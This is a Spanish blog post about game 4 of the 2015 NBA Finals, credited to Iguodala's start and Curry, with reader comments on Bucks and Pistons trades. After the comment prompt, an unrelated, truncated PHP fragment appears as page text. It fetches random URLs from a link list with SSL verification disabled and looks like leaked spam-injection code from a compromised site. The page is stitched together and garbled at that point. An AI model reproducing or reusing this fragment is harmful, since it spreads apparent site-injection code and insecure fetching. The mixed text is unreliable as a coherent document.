La Crónica: la noche de la iguana

12 de June de 2015 por TheDeerHunter

Kerr sacrificaba la torre de inicio. Andrew Bogut se iba al banco como principal señalado por el mal juego general de los anteriores partidos. En su lugar se estrenaba como titular este curso Andre Iguodala, cuando siempre lo había sido durante toda su carrera. Sin duda el bueno de Iggy había sido de lo poco salvable en las filas de los “guerreros” hasta el momento.

El choque se iniciaba por los mismos derroteros acostumbrados. Los Warriors fallando canastas cómodas y los secundarios locales haciendo muy bien su trabajo. Un 7-0 sin intervención directa de “The King” que aventuraba dolor y sufrimiento al rival contra las cuerdas. Puro espejismo.

El planteamiento de Steve Kerr comenzaba a funcionar muy pronto. Abría Stephen Curry con un triple, y pronto se veía arropado por puntos de Draymond Green  y el mismo Iguodala. Los Cavs pronto se dieron cuenta de que no iba a ser como otros días y no encontraron manera de intimidar al small ball rival. Curry y compañía lograban darle velocidad al juego por primera vez en toda la serie y se inició un intercambio de golpes que en nada beneficia al limitado equipo de David Blatt. Al final el primer parcial se cerró con un 24-31 y los visitantes cargados de confianza, confianza que viene siendo un arma de doble filo para estos Warriors. En el segundo cuarto repetían guión y controlaban el juego muy cómodamente. La diferencia alcanzaba pronto los 15 puntos con, esta vez sí, un excelente Draymond Green. Ante la inoperancia del perímetro rival, los Warriors se atrevían incluso con defensas dobles a LeBron James que sufría lo indecible para anotar. 

Primer punto de inflexión. Bogut sale a pista y en tres minutos le da tiempo a descalabrar a LeBron, hacer dos faltas más y equivocarse todo lo humanamente posible. Una calamidad que logra espabilar a los Cavs vía Tristan Thompson y un Timofey Mozgov que iba a cuajar el partido de su vida. Se llegaba al descanso con 10 puntos de diferencia que bien podrían haber sido más de 15. En este punto un dato significativo: Sólo cuatro jugadores no elegidos vía draft han superado 20 puntos en un partido de la final. Dos de ellos este mismo año: Dellavedova y Mozgov.

En la reanudación precisamente Matthew Dellavedova daba dos zarpazos en forma de triples. Coincidía el mejor momento de la dupla LeBron-Mozgov, con problemas de faltas de Green y con la enésima pájara de su equipo personificada en Harrison Barnes. Un tiempo muerto muy bien pedido por Steve Kerr dejaba la sangría en sólo 3 puntos de ventaja y cara a cara con la tragedia. Lograban salir del entuerto irónicamente gracias a un triple del propio Barnes, un par de buenas acciones de Iguodala y un triplazo postrero de Curry.

El mínimo descanso que se tomó LeBron al inicio del último cuarto tuvo como consecuencia otra escapada de los Warriors hasta los 10 de diferencia. Esta vez iba a ser demasiado para ellos y pronto bajarían los brazos ante el acierto de Curry y, especialmente, de un Iguodala estelar. Los Warriors, por esta vez, lograban imponer su calidad.

Comenta

9 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Ilyasova a los Pistons por Butler… cuando abrimos una entrada de mercato? 😀

      Citar

  2. Ruxixón dice:
    #2

    Excelente respuesta de Kerr,le tocaba y correspondió.Sorprendió jugando sin center,y al principio parecía que iban a tener agujeros por su debilidad en el rebote pero fue el espejismo inicial.Control de partido y victoria merecida.Por nuestra parte poco que rascar,si acaso es esperable y exigible que JR Smith se entone de una santa vez,que no debe llegar al 30 % en las finales.

      Citar

  3. Ruxixón dice:
    #3

    Jose Luis:
    Ilyasova a los Pistons por Butler… cuando abrimos una entrada de mercato?

    ¿Despejando el camino para Middleton?En clave Pistons poco que explicar,jugador Van Gundy,a ver si no se toca los huevos en Detroit.

      Citar

  4. Jose Luis dice:
    #4

    Middleton de 4?

    quizá Parker… o Anteto, pero Middleton lo veo bajito, no sé.

    Henson también necesita minutos para desarrollarse

      Citar

  5. Nacho dice:
    #5

    Ruxixón: ¿Despejando el camino para Middleton?En clave Pistons poco que explicar,jugador Van Gundy,a ver si no se toca los huevos en Detroit.

    Pues veo muy bien al turco con el bueno de Stan. Espero que éste no le deje relajarse

      Citar

  6. Ruxixón dice:
    #6

    Jose Luis:
    Middleton de 4?

    quizá Parker… o Anteto, pero Middleton lo veo bajito, no sé.

    Henson también necesita minutos para desarrollarse

    No,me refería a que liberan dinero en el cambio,4 millones,disponiendo de 22 millones libres a falta de los rookies que pudieran llegar,pudiendo asegurarse la continuidad de Middleton con un nuevo contrato.Entre el griego y Parker estará la posición,no sé,son bastante complementarios y pueden jugar indistintamente en las dos posiciones.

      Citar

  7. Jose Luis dice:
    #7

    Ah perfecto ruxixon

    si, deberían agotar el espacio y renovar luego a Middleton… a ver qué pasa.

      Citar

  8. Vader dice:
    #8

    Ruxixón: No,me refería a que liberan dinero en el cambio,4 millones,disponiendo de 22 millones libres a falta de los rookies que pudieran llegar,pudiendo asegurarse la continuidad de Middleton con un nuevo contrato.Entre el griego y Parker estará la posición,no sé,son bastante complementarios y pueden jugar indistintamente en las dos posiciones.

    Creo que de 4 jugará Parker y Henson, y el griego de 3. Ahora tienen espacio para renovar a Middleton y fichar un pivot en la AL.

    Saludos!!

      Citar

  9. Jose Luis dice:
    #9

    tampoco nadie para esta noche? 🙁

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>